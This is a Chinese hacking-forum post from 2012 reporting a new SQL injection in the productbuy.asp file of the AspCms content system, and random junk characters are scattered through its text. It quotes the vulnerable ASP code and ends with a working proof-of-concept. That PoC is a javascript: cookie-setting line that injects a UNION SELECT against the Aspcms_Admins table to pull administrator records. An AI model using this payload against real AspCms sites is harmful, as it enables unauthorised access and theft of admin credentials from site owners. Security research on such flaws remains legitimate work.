好久没上土司了,上来一看发现在删号名单内...../ {+ I' h$ z, F3 c
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。8 T2 H5 r" V3 ^4 k8 E( X6 \
废话不多说,看代码:
' \$ I3 ]1 t$ b# B+ m/ Z2 @& `& y8 [( I
<%! ~5 B& Z- a1 l* n, z4 Y
* D' W1 Z3 B% ?' y
if action = "buy" then( c& I& K j( D5 } B8 @
$ \! j6 x6 M) Q7 q addOrder()
0 N& d% ^" p* D8 E' p. g/ y3 O8 f
else) s/ _- w3 K; a( N5 h
9 |4 ]' v* a ?1 v# ]- U# Z echoContent()
4 Y. i- T: n% |0 m6 d: Y- `
% ^9 h& u/ @$ R* Aend if
9 G$ O/ Z! [! O( Q( o* n8 R2 p( D9 K) W) ]
( }* L' e6 h1 f2 }2 [
: ?2 ~7 @2 l; f9 u- }- A, _
……略过
( B& M. p! ~7 n' ?9 g3 [
/ Z( Q0 u) {5 F1 B8 r0 b' v3 h) S. t8 T' I4 ?( `
3 c4 N; X; c' D8 w
Sub echoContent()
! h* Y! _' E7 E7 s4 }4 k2 O
1 \: L% |$ U' k: B/ `6 \. U dim id% j p4 G1 \! l6 N0 N
* z6 U, |; ?* P, u. d id=getForm("id","get")
- s: h* F: B. U9 i6 p& R$ m7 R9 i J& G5 f
+ F6 d4 K1 @( \8 Y# {0 O+ d
) G- C& e B$ p! [. O; w6 O if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
8 X9 W5 |$ M6 b. ]: |1 h6 i5 P. Z2 T. c' w+ k
4 B( V7 h& l5 i6 m
5 Y( w r& h* s w dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
% ~- B' C2 m: X. n% |# ^* r$ Q& w( a: T& i, K% }& ~' s4 k
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
& x6 \/ c, c Z; ^2 d6 k' y, h4 }
, k, c! D* N0 f4 g9 M Dim templatePath,tempStr2 U. d3 B, T( a* r
* x: \) @* ^: q' G& j# W templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
3 B$ W% v$ E. w o- m4 I) ~8 e4 c2 i4 W% j7 J. J+ f
0 _6 R' n# E& }( W
- X- Z% {8 R8 o+ V! [
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")' Q( k" g b% {* ~
' s$ F; P' z. e. a8 p% G selectproduct=rsObj(0)# Y- g* \0 {! E; O9 p
% v8 C& w9 I" m
$ \ I# R, r% f' V% [. H9 U5 @7 I/ c( s+ [2 r, K
Dim linkman,gender,phone,mobile,email,qq,address,postcode
% Z; K7 J" ]2 }3 T- O0 a8 Z6 ^$ X* F. L+ L
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0( l$ @2 g+ |8 Y2 j+ r" {' A# z
8 o& v8 S/ Y9 p/ E' n6 n+ C. k$ T
if rCookie("loginstatus")=1 then
$ O( N2 J1 R5 c( }$ ]3 E0 |- s' G3 z6 f V: L
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
. Z, o9 k1 k: v2 R( Q* @% ?
; P5 d* D/ L& i linkman=rsObj("truename")% V% r0 t4 `4 H# V8 K: t
3 n# z- \4 V$ D. q6 E) ^3 H
gender=rsObj("gender")
( H: i2 t, `6 n) K) o, w( a5 q6 [) Q1 j" _# \
phone=rsObj("phone")+ c! q/ r$ t9 N5 t# f! @: v, ]7 @, w) o
9 [* i! Q! }* b4 u2 }% F. u5 W mobile=rsObj("mobile")
. ]% w4 Y! n P" B
- k$ Q4 v' u( A p! ^3 d% e- Q email=rsObj("email")
' f4 n* z: Z4 n. [$ T3 n. l
# Q2 l% g$ @( A qq=rsObj("qq")& @6 ^( a, ^2 `% B4 ]
$ U1 ?& F! Z+ Z/ i! b: o% | address=rsObj("address"): [! h4 {+ N2 t0 B) o' Y- m
! T5 p4 i; V# m8 d9 U2 {; w postcode=rsObj("postcode")
9 y7 W2 }3 r; y5 Q2 D2 c) c; S. Y, g" r F; u, p) X/ K7 E0 k
else
* p& J' R0 T2 M- a, R6 v" \* T$ X' ]0 R9 v/ y9 t
gender=19 H% S% h: Y; }4 p. S8 y
$ E, a$ b5 [1 H5 [! I. w6 J4 R. h end if1 b$ V. \- n5 E( C" K+ k
+ u% h2 j! M) V, i
rsObj.close()
5 E y" M; G9 ?( [ c# d8 n/ b' J
. v" \: q: _, l : e; r5 w- s8 Y; C, J4 x
7 z4 d5 e% p9 c( u" {8 d9 _, c
with templateObj
, Y2 S2 G5 T& Q7 j& l9 w9 i8 R) e7 R% F" K# M7 v. G# ~
.content=loadFile(templatePath)
3 v7 _+ X9 k. O2 g- t% P; ~, |( A: u G2 F
.parseHtml()+ Z5 a* W: e5 m
) j. Q, C) a$ @5 z3 r .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)( L' D: J: l: @$ F- Z
! k/ j% _- v1 ^6 Z7 B0 y8 f5 K .content=replaceStr(.content,"[aspcms:linkman]",linkman)
3 ]5 b: r8 S( z6 }; D; ?3 C9 F, D9 }, a K/ E
.content=replaceStr(.content,"[aspcms:gender]",gender) 3 S6 U5 M3 f# v, p) L) H8 m/ w8 \6 k/ I
7 B3 A3 c; @4 S9 j1 m7 U1 y .content=replaceStr(.content,"[aspcms:phone]",phone)
' P- w* q x6 f' a, }$ n0 h
7 H' x, k6 F/ S+ ^) w# `. N9 N* k .content=replaceStr(.content,"[aspcms:mobile]",mobile)
' Y- l+ t( I5 A' `1 z! J3 K
U5 d2 b7 H4 m1 d .content=replaceStr(.content,"[aspcms:email]",email)
$ J! A* ]5 G) Y
! Y9 D5 s% R/ L) F$ \ .content=replaceStr(.content,"[aspcms:qq]",qq)
6 X) T" T( S d5 ^5 n5 \1 v7 v9 e
.content=replaceStr(.content,"[aspcms:address]",address)
. K5 p8 j$ P& y& D, g2 }# g7 Y7 {% y# N0 Y, `' [' _8 N& b8 x0 b& \- f# L+ s
.content=replaceStr(.content,"[aspcms:postcode]",postcode) % U4 b# |4 C, }! ~# ^
( X" ?9 k8 c& A
.parseCommon()
8 P/ w$ V. W( B$ x# o( | ]/ y
echo .content 5 h" I% F; f1 O' J
9 @' p8 a: D! `
end with& G. e- H/ @& u+ h/ ^2 E! _
2 m1 e/ r: m, b set templateobj =nothing : terminateAllObjects
" L/ b- J& S- c1 u% g& t" O- x% v1 S& }3 y4 M! H2 d9 h5 t
End Sub4 u, N5 j- J1 {% G% ]/ p+ `4 R0 |
漏洞很明显,没啥好说的9 B5 O- D% ]( v+ y8 m0 X8 O/ ~
poc:
- U, b3 Z% G/ v' A/ e+ e" }6 N
. O8 J6 O; u' hjavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
% A1 P9 o1 k, ?8 L9 r( q0 U* {+ k" ], X& \4 S# w
|
发表于 2012-12-27 08:35:05
收藏
支持
反对